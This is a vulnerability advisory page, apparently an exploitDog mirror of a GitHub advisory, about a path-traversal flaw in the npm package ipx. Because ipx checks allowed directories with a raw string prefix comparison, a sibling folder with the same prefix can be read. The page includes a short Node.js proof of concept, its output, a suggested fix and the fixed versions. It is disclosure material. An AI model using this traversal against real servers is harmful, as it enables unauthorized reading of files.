Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-mm3p-j368-7jcr

Опубликовано: 04 авг. 2025
Источник: github
Github: Прошло ревью
CVSS4: 6.9

Описание

IPX Allows Path Traversal via Prefix Matching Bypass

Summary

The approach used to check whether a path is within allowed directories is vulnerable to path prefix bypass when the allowed directories do not end with a path separator. This occurs because the check relies on a raw string prefix comparison.

PoC

  • setup
mkdir ~/public123 move a png file under ~/public123 with name test.png cd npm i ipx
  • main.js
import { createIPX, ipxFSStorage } from "ipx"; const ipx = createIPX({ storage: ipxFSStorage({ dir: "./public" }), }); (async () => { { const source = await ipx("../public123/test.png"); // access file outside ./public dir because of same prefix folder const { data, format } = await source.process(); console.log(format) // print image data } { try { const source = await ipx("../publi123/test.png"); // forbidden path: the prefix is not the same const { data, format } = await source.process(); console.log(data) } catch (err) { console.log(err.message) // Forbidden path: } } })()
  • node main.js
png Forbidden path: /../publi123/test.png

Impact

Path Traversal

Possible Fix

Check if the dir ends with / (path separator) and if not, add before calling startsWith

Пакеты

Наименование

ipx

npm
Затронутые версииВерсия исправления

< 1.3.2

1.3.2

Наименование

ipx

npm
Затронутые версииВерсия исправления

>= 2.0.0-0, < 2.1.1

2.1.1

Наименование

ipx

npm
Затронутые версииВерсия исправления

>= 3.0.0, < 3.1.1

3.1.1

EPSS

Процентиль: 39%
0.00176
Низкий

6.9 Medium

CVSS4

Дефекты

CWE-22

Связанные уязвимости

CVSS3: 9.8
nvd
6 месяцев назад

IPX is an image optimizer powered by sharp and svgo. In versions 1.3.1 and below, 2.0.0-0 through 2.1.0, and 3.0.0 through 3.1.0, the approach used to check whether a path is within allowed directories is vulnerable to path prefix bypass when the allowed directories do not end with a path separator. This occurs because the check relies on a raw string prefix comparison. This is fixed in versions 1.3.2, 2.1.1 and 3.1.1.

EPSS

Процентиль: 39%
0.00176
Низкий

6.9 Medium

CVSS4

Дефекты

CWE-22